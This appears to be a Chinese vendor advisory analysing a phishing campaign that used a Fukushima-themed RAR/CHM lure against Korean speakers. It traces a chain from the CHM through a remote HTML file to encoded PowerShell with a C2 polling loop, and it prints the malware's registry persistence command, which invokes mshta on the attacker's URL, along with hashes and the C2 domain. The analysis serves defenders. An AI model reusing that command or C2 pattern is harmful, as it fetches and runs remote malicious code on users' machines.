【恶意文件】利用日本排放核污水事件钓鱼朝鲜语使用人员

1. 初始攻击向量 —— Fukushima.rar

VT平台首次上传样本的国家归属地为KR - 朝鲜。

Rar文件解压后，得到译文为“福岛.chm”的文件。

2. 初始攻击向量 —— Fukushima.chm

Chm文件打开后即如下所示（左上角的小箭头即为恶意行为的触发按钮）：

通过 7zip 打开该文件，可以得到该 chm 文件的内部结构：

chm 文件被加载后将执行该Start.html文件。Start.html文件的内容如下所示，通过主动触发按钮事件，访问hxxp://navercorp.ru/dashboard/image/202302/4.html继续执行网页脚本。

3. 最终恶意文件 —— 4.html

如下所示，被远程拉取并执行的html文件实际执行了一段powershell，对数据进行Base64进行解码后得到可读的代码。

解码后的Powershell有多种功能，其通过向 

hxxp://navercorp.ru/dashboard/image/202302/com.php 

地址POST数据，获取指令并将指令执行后的结果返回。Client通过ComputerName和 UserName 进行标识。样本写入注册表持久化项达到在用户主机上长时间驻留的目的。写入的Data为：

'c:windowssystem32cmd.exe /c PowerShell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass ping -n 1 -w 391763 2.2.2.2 || mshta http://navercorp.ru/dashboard/image/202302/4.html'

在样本的主循环中，每5秒向C2发送一次请求，获取C2 的指令。

对Powershell脚本部分混淆后的字符串进行重命名后，部分代码如下所示。

POST方法中，若 $InputStream 为空则表示接受C2传输的命令，若不为空则表示回传C2指令的执行结果。

一次完整的C2命令执行包含：

1. 向C2发送空POST包请求指令。

2. 解析C2发送的指令，并将指令执行后的结果[R=xxxxx]/需要的数据返回[data]。

a4ac2b37cd35ad8b4f4cb737a7dbf5ae594fc2b62fea2efa192acac4d14fe254

b31b89e646de6e9c5cbe21798e0157fef4d8e612d181085377348c974540760a

4c46216eba404588e0bacd001c8fd7c1cb2c7fbe453bc46cddca5390c5307f27

http://navercorp.ru

1.避免将重要服务在外网开放，若一定要开放，需增加口令复杂度，避免使用弱口令。

2.避免打开可疑或来历不明的邮件，尤其是其中的链接和附件等，如一定要打开未知文件，请先使用杀毒软件进行扫描。

3.安装信誉良好的防病毒/反间谍软件，定期进行系统全盘扫描，并删除检测到的威胁，按时升级打补丁。

【深信服统一端点安全管理系统aES】已支持查杀拦截此次事件使用的病毒文件，请更新软件（如有定制请先咨询售后再更新版本）和病毒库至最新版本，并接入深信服安全云脑，及时查杀新威胁；

【深信服下一代防火墙AF】的安全防护规则更新至最新版本，接入深信服安全云脑，“云鉴” 服务即可轻松抵御此高危风险。

【深信服安全感知管理平台SIP】建议用户及时更新规则库，接入深信服安全云脑，并联动【深信服下一代防火墙AF】实现对高危风险的入侵防护。

【深信服安全托管服务MSS】以保障用户网络安全“持续有效”为目标，通过将用户安全设备接入安全运营中心，依托于XDR安全能力平台和MSSP安全服务平台实现有效协同的“人机共智”模式，围绕资产、脆弱性、威胁、事件四个要素为用户提供7*24H的安全运营服务，快速扩展持续有效的安全运营能力，保障可承诺的风险管控效果。